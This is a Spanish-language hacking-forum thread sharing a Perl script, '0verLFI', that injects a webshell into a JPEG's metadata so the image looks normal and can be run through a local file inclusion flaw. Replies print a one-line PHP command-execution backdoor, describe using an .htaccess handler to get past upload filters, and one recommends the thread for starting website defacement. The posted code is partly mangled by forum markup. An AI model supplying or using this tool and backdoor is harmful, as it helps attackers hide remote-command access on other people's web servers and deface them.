LFI: Inyector de Webshells en imágenes

  • 5 Respuestas
  • 4077 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

LFI: Inyector de Webshells en imágenes

  • en: Julio 17, 2011, 07:54:53 pm
Código: Perl
  1. ####################################################
  2. #          0verLFI v0.2 Coded by The X-C3LL        #      
  3. ####################################################
  4. #  Se trata de una herramienta bastante sencilla   #
  5. #  para inyectar una shell en una imagen JPEG      #
  6. #  y que esta siga pudiendo ser visualizada        #
  7. #  correctamente, de esta forma nadie sospecha.    #
  8. #  Lo único que hace es meter la shell dentro      #
  9. #  de los metadatos de la foto.                    #
  10. ####################################################
  11. #             Gr33tz to Seth & CPH Comunity        #
  12. ####################################################
  13. #          HTTP://0VERL0AD.BLOGSPOT.COM            #
  14. ####################################################
  15.  
  16.  
  17.  
  18. use Image::ExifTool;
  19.  
  20.  
  21. +-----------------------------------+
  22.    0verLFI v0.1 coded by The X-C3LL  
  23.  
  24.     Http://0verl0ad.blogspot.com  
  25. +-----------------------------------+
  26.  
  27. );
  28.  
  29. die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;
  30.  
  31. my $file = $ARGV[0];
  32. my $jpeg = $ARGV[1];
  33. print "<ul class="bbc_list"><li type="square">Image = $jpeg \n";[/li][/list]
  34. print "</li><li type="square">Shell = $file \n";[/li][/list]
  35.  
  36. open (HANDLE, $file);
  37. @array = <HANDLE>;
  38. my $string = join("\n", @array);
  39.  
  40.  
  41. my $tool = Image::ExifTool->new();
  42.  
  43. $tool->ExtractInfo($jpeg);
  44. $tool->SetNewValue("Model", $string);
  45. $done = $tool->WriteInfo($jpeg);

Simplemente tienen que pasar la imagen a inyectar como argumento:



Como podeis comprobar, tras modificar los metadatos la imagen continúa viendose perfectamente:



Y si lo testeamos en un entorno local vulnerable veremos que funciona:




Autor: The X-C3LL
Fuente: Foro Portal Hacker
« Última modificación: Agosto 16, 2014, 10:35:24 am por Expermicid »

Desconectado KzZiIi3l

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
  • Aprendiendo y Compartiendo en Masa!
    • Ver Perfil
    • Email

Re:LFI: Inyector de Webshells en imágenes

  • en: Diciembre 06, 2011, 09:30:32 pm
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?> 

Desconectado incroyable

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:LFI: Inyector de Webshells en imágenes

  • en: Marzo 26, 2012, 12:44:55 am
te lo recomiendo .. el mejor texto para empezar con el defacing ... saludos

Desconectado backconnect

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:LFI: Inyector de Webshells en imágenes

  • en: Julio 04, 2012, 04:54:11 am
Esto es lo mismo qe usar JPG-inclusion o para bypassear uploads?? osea usar Gimp ó wrjpgcom para insertar en un comentario el code PHP por ejemplo usar una misma shell como mini backdoor: <?php system($_GET['cmd']); die; ?>

exactamente eso mismo es una jpg inclusion, para bypasear uploads no serviria porq lo ejecutaria como jpg. necesitarias un .htaccess con addhandler para que lo ejecutara en otra extension , el autor deberia de poner que sin un file include esto no sirve de nada.

Desconectado hdbreaker

  • *
  • Ex-Staff
  • *****
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
  • Skype: hdbreaker96
  • Twitter: @SecSignal
    • Ver Perfil
    • Security Signal
    • Email

Re:LFI: Inyector de Webshells en imágenes

  • en: Julio 04, 2012, 07:32:22 pm
Es lo mismo q usar Cat Shell.txt >> Image.jpg

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado aura16

  • *
  • Underc0der
  • Mensajes: 84
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:LFI: Inyector de Webshells en imágenes

  • en: Julio 04, 2012, 08:03:33 pm
disculpa mi ignorancia pero como le ago para meter meta-datos a una imagen ._.
o como se usa esto?

lo yamo desde un archivo externo o meto directamente el codigo en los meta-datos?

 

Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 6916
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
FG-Inyector Framework

Iniciado por ZanGetsu

Respuestas: 0
Vistas: 2294
Último mensaje Julio 03, 2013, 03:23:58 am
por ZanGetsu